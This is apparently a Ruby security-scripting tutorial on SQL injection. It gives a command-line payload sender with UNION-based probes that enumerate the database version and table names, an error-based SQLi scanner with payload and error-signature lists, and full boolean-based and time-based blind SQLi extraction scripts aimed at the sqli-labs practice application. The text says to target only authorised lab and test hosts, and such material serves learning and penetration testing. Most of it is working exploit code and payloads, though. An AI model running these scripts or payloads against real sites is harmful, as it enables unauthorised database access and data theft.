SQL Injection Scanner

A basic SQLi helper script that works like a command-line browser: it sends the payload you give it and prints the relevant part of the response.

This is a very basic script: it takes the payload you give it, sends it in the vulnerable parameter and returns the response to you. I'll use http://testphp.vulnweb.com/ as the target because it is explicitly legal to test — only run these scripts against systems you are authorised to test.
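#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
# Send your payload from command line
#
# Usage: ruby sqli-basic.rb <host-or-url> <payload>
#
# Sends one operator-supplied payload as the `artist` parameter of
# /artists.php on the target and prints the text of the page's
# <h2 id='pageName'> element, which is where the test site echoes the
# injected column.  Only run this against hosts you are authorised to test.
require "net/http"

if ARGV.size < 2
  puts "[+] ruby #{__FILE__} [IP ADDRESS] [PAYLOAD]"
  exit 1 # wrong usage is a failure, not success
else
  host, payload = ARGV
end

# Accept either a bare host ("testphp.vulnweb.com") or a full URL with a
# scheme ("https://host"), so the HTTPS branch below is actually reachable
# (with a hard-coded "http://" prefix it could never be taken).
target = host.include?("://") ? host : "http://#{host}"
uri = URI.parse("#{target}/artists.php?")
# encode_www_form percent-encodes the payload ('#', '&', spaces, ...) so the
# whole string reaches the server as the value of one parameter.
uri.query = URI.encode_www_form({ "artist" => payload })
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
# Do not hang forever on a target that blackholes the request.
http.open_timeout = 10
http.read_timeout = 30
# http.set_debug_output($stdout)

request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
# puts "[+] Status code: "+ response.code + "\n\n"
# puts response.body.gsub(/<.*?>/, '').strip
# Keep only the page-name heading and strip its tags.  The body is
# server-controlled, so also drop non-printable bytes: otherwise a hostile
# page could push terminal escape sequences into the operator's shell.
heading = response.body.to_s.scan(/<h2 id='pageName'>.*<\/h2>/).join.gsub(/<.*?>/, '').strip
puts heading.gsub(/[^[:print:]]/, '')

puts ""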
I've commented out the line `puts response.body.gsub(/<.*?>/, '').strip` and added a custom regular expression that extracts only the `<h2 id='pageName'>` heading, which is where this page reflects the injected column, so the output is limited to what we care about.
Let's test it in action. The first probe with four NULLs produces a MySQL warning (the UNION fails because the column count is wrong), the three-NULL probe is silent, so the original query has three columns; the remaining probes then put the data we want into the second column, which is the one reflected in the heading.
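# Target for the examples below; testphp.vulnweb.com is a public site that
# is explicitly meant to be tested.  Change it only to a host you are
# authorised to test.
TARGET=testphp.vulnweb.com

# Step 1 - find the column count.  Four NULLs make the UNION fail (the
# query returns false, so mysql_fetch_array() warns); three NULLs are
# accepted silently, so the original SELECT has three columns.
ruby sqli-basic.rb "$TARGET" "-1 UNION ALL SELECT NULL,NULL,NULL,NULL#" | grep -i -e warning -e error
# => Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62

ruby sqli-basic.rb "$TARGET" "-1 UNION ALL SELECT NULL,NULL,NULL#" | grep -i -e warning -e error
# =>

# Step 2 - the second column is the one reflected in the page heading, so
# that is where the data we want to read goes.
ruby sqli-basic.rb "$TARGET" "-1 UNION ALL SELECT NULL,@@VERSION,NULL#"
# => artist: 5.1.73-0ubuntu0.10.04.1

ruby sqli-basic.rb "$TARGET" "-1 UNION ALL SELECT NULL,GROUP_CONCAT(table_name),NULL FROM information_schema.tables#"
# => artist: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL
# (output truncated in the original capture)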
Here is a very basic error-based SQL-injection scanner; develop it as far as you can. Note that it only flags targets that echo a database error message back in the response, so blind injections (like the ones exploited in the scripts further down) are not detected by it.
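#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
# Very basic SQLi scanner!
#
# Usage: ruby sqli.rb [URL]
#
# Appends each probe payload to the query string of URL (default: the
# legal-to-test testphp.vulnweb.com page) and reports the URL as vulnerable
# when the response body contains a database error message.  This is
# error-based detection only: an injection that produces no error text
# (blind boolean/time-based) is not detected here.
require 'net/http'

# Some SQLi payloads
PAYLOADS =
[
  "'",
  '"',
  "' or 1=2--+"
].freeze

# Some database error responses (regexp sources, matched case-insensitively).
# NOTE(review): "Warning" and "line.*[0-9]" match far more than SQL errors
# and will give false positives; tighten them before trusting a hit.
ERRORS =
{
  :mysql => [
    "SQL.*syntax",
    "mysql.*(fetch).*array",
    "Warning"
  ],
  :mssql => [
    "line.*[0-9]",
    "Microsoft SQL Native Client error.*"
  ],
  :oracle => [
    ".*ORA-[0-9].*",
    "Warning"
  ]
}.freeze

# Returns the engine symbol (:mysql, :mssql, :oracle) whose error signature
# appears in +body+, or nil when none of the patterns match.
def detect_db_error(body, errors = ERRORS)
  errors.each do |engine, patterns|
    patterns.each do |pattern|
      return engine if body =~ /#{pattern}/i
    end
  end
  nil
end

# GETs +uri+ and returns the body; a network failure ends the scan with a
# non-zero exit status instead of a stack trace.
def fetch(uri)
  Net::HTTP.get(uri)
rescue SocketError, SystemCallError, Timeout::Error => e
  abort "[!] Request to #{uri} failed: #{e.message}"
end

# Try a known vulnerable site unless a URL was given on the command line
# (the original ignored ARGV and always scanned the hard-coded page).
base = URI.parse(ARGV.fetch(0, "http://testphp.vulnweb.com/artists.php?artist=1"))
abort "[!] #{base} has no query string to inject into" if base.query.nil?

# Baseline check: if the unmodified page already carries error text, any
# "hit" below is meaningless, so say so up front.
if detect_db_error(fetch(base))
  warn "[!] The unmodified page already contains database error text; hits below may be false positives"
end

PAYLOADS.each do |payload|
  uri = base.dup

  # Update the query with a payload.  The setter percent-encodes characters
  # the URI grammar forbids; the server decodes them, so the quote still
  # reaches the application's SQL.
  uri.query = uri.query + payload

  # Send get request
  response = fetch(uri)

  # Search if an error occurred = vulnerable
  engine = detect_db_error(response)
  next if engine.nil?

  # Undo the percent-encoding so the reported URL shows the raw payload
  # (decode_www_form_component also renders a '+' as a space).
  puts "[+] The #{URI.decode_www_form_component(uri.to_s)} is vulnerable! (#{engine} error text found)"
  break
end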
Results (note: the listing as originally published did not read its command-line argument — it always scanned the hard-coded testphp.vulnweb.com URL — which is why the URL reported below differs from the one passed on the command line)
ruby sqli.rb http://testasp.vulnweb.com/showforum.asp?id=0
[+] The http://testphp.vulnweb.com/artists.php?artist=1' is vulnerable!

Boolean-based SQLi Exploit Script

Here is a Boolean-based SQLi exploit for the sqli-labs vulnerable application (Less-8, which prints "You are in..........." only when the injected condition is true — that string is the oracle the script checks for).
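#!/usr/bin/env ruby
# Boolean-based SQLi exploit
# Sabri Saleh | @KINGSABRI
#
# Usage: ruby sqli-boolean.rb <IP ADDRESS>
#
# Extracts a string from the database one character at a time against
# sqli-labs Less-8: for every position it asks "is ASCII(char at position)
# equal to X?" for each printable X and uses the page's
# "You are in..........." marker as the TRUE oracle.  Only run this against
# a lab you are authorised to test.
require 'open-uri'

if ARGV.size < 1
  puts "[+] ruby #{__FILE__} <IP ADDRESS>"
  exit 1 # wrong usage is a failure, not success
else
  host = ARGV[0]
end

# Just colorizing outputs
class String
  def red; colorize(self, "\e[1m\e[31m"); end
  def green; colorize(self, "\e[1m\e[32m"); end
  def bold; colorize(self, "\e[1m"); end
  def colorize(text, color_code) "#{color_code}#{text}\e[0m" end
end

# Text the lab prints only when the injected condition is true.
TRUE_MARKER = "You are in...........".freeze

# Escapes like the removed URI.encode did (spaces become %20 while the
# quote, parentheses, comma, '=' and the trailing '+' of "--+" pass through),
# so the server decodes "--+" to "-- " and comments out the rest of the query.
URL_ESCAPER = URI::RFC2396_Parser.new

# SQL injection
# Requests url+query and returns true when TRUE_MARKER is in the response,
# false otherwise.  A network failure aborts the run with exit status 1.
def send_bbsqli(url, query)
  target = URI.parse(URL_ESCAPER.escape("#{url}#{query}"))
  # .read closes the underlying IO (the old open() call left it dangling)
  # and the timeouts keep a dead host from hanging the brute force forever.
  body = target.read(open_timeout: 10, read_timeout: 30)
  body.include?(TRUE_MARKER)
rescue StandardError => e
  # StandardError covers OpenURI::HTTPError, SocketError and the timeouts;
  # `rescue Exception` would also swallow Ctrl-C and `exit`.
  warn "[!] Failed to SQL inject #{e}".red
  exit 1
end

url = "http://#{host}/sqli-labs/Less-8/index.php?id="

puts "[*] Start Sending Boolean-based SQLi".bold

# OPTIMIZE: a linear scan costs up to 95 requests per character; a binary
# search on the ASCII value would need about 7.
extracted = []
(1..100).each do |position|
  found = (32..126).find do |char|
    puts "[*] Brute-forcing on Position: ".bold + "#{position}".green + " | ".bold + "Character: ".bold + "#{char} = #{char.chr}".green

    # Put your query here
    # query = "1' AND (ASCII(SUBSTR((SELECT DATABASE()),#{position},1)))=#{char}--+"
    query = "1' AND (ASCII(SUBSTR((SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1),#{position},1)))=#{char}--+"
    send_bbsqli(url, query)
  end

  # No printable character matched: SUBSTR returned '' past the end of the
  # string (ASCII 0), so stop instead of probing all remaining positions.
  break if found.nil?

  puts "[+] Found character: ".bold + "#{found.to_s(16)} hex".green

  extracted << found.chr
  puts "[+] Extracted characters: ".bold + "#{extracted.join}".green
end

puts "\n\n[+] Final found string: ".bold + "#{extracted.join}".green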

Time-based SQLi Exploit Script

A time-based SQLi exploit for the sqli-labs vulnerable application (Less-10, which gives no visible feedback at all; a correct guess is detected only by the injected SLEEP() delaying the response).
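#!/usr/bin/env ruby
# Time-based SQLi exploit
# Sabri Saleh | @KINGSABRI
#
# Usage: ruby sqli-time.rb <IP ADDRESS>
#
# Extracts the current database name one character at a time against
# sqli-labs Less-10, which gives no visible feedback: the injected IF()
# calls SLEEP(time2wait) when the guess is right, so a response that takes
# at least time2wait seconds is the TRUE oracle.  Only run this against a
# lab you are authorised to test.
require 'open-uri'

if ARGV.size < 1
  puts "[+] ruby #{__FILE__} <IP ADDRESS>"
  exit 1 # wrong usage is a failure, not success
else
  host = ARGV[0]
end

# Just colorizing outputs
class String
  def red; colorize(self, "\e[1m\e[31m"); end
  def green; colorize(self, "\e[1m\e[32m"); end
  def bold; colorize(self, "\e[1m"); end
  def colorize(text, color_code) "#{color_code}#{text}\e[0m" end
end

# Escapes like the removed URI.encode did (spaces become %20, the double
# quote %22, while parentheses, comma, '=' and the trailing '+' of "--+"
# pass through), so the server decodes "--+" to "-- " and comments out the
# rest of the query.
URL_ESCAPER = URI::RFC2396_Parser.new

# SQL injection
# Requests url+query and returns true when the response took at least
# +time2wait+ seconds (the injected SLEEP fired), false otherwise.
# A network failure aborts the run with exit status 1.
def send_tbsqli(url, query, time2wait)
  target = URI.parse(URL_ESCAPER.escape("#{url}#{query}"))
  # Monotonic clock: Time.now can jump (NTP, manual change) and fake or
  # hide a delay.
  started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
  # read_timeout must comfortably exceed the injected SLEEP, or every
  # correct guess would surface as a network failure.  .read also closes
  # the IO the old open() call left dangling.
  target.read(open_timeout: 10, read_timeout: time2wait * 4)
  elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - started

  elapsed >= time2wait
rescue StandardError => e
  # StandardError covers OpenURI::HTTPError, SocketError and the timeouts;
  # `rescue Exception` would also swallow Ctrl-C and `exit`.
  warn "[!] Failed to SQL inject #{e}".red
  exit 1
end

url = "http://#{host}/sqli-labs/Less-10/index.php?id="

puts "[*] Start Sending Time-based SQLi".bold
time2wait = 5
extracted = []
# OPTIMIZE: a linear scan costs up to 95 requests per character; a binary
# search on the ASCII value would need about 7.
(1..76).each do |position|
  found = (32..126).find do |char|
    puts "[*] Brute-forcing on Position: ".bold + "#{position}".green + " | ".bold + "Character: ".bold + "#{char} = #{char.chr}".green

    # Put your query here
    query = "1\" AND IF((ASCII(SUBSTR((SELECT DATABASE()),#{position},1)))=#{char}, SLEEP(#{time2wait}), NULL)--+"

    # One slow response (busy server, network hiccup) looks exactly like
    # SLEEP(), so only accept a guess whose delay reproduces; this costs a
    # second request on hits only.
    send_tbsqli(url, query, time2wait) && send_tbsqli(url, query, time2wait)
  end

  # No printable character matched: SUBSTR returned '' past the end of the
  # name (ASCII 0), so stop instead of probing all remaining positions.
  break if found.nil?

  puts "[+] Found character: ".bold + "#{found.to_s(16)} hex".green

  extracted << found.chr
  puts "[+] Extracted characters: ".bold + "#{extracted.join}".green
end

puts "\n\n[+] Final found string: ".bold + "#{extracted.join}".green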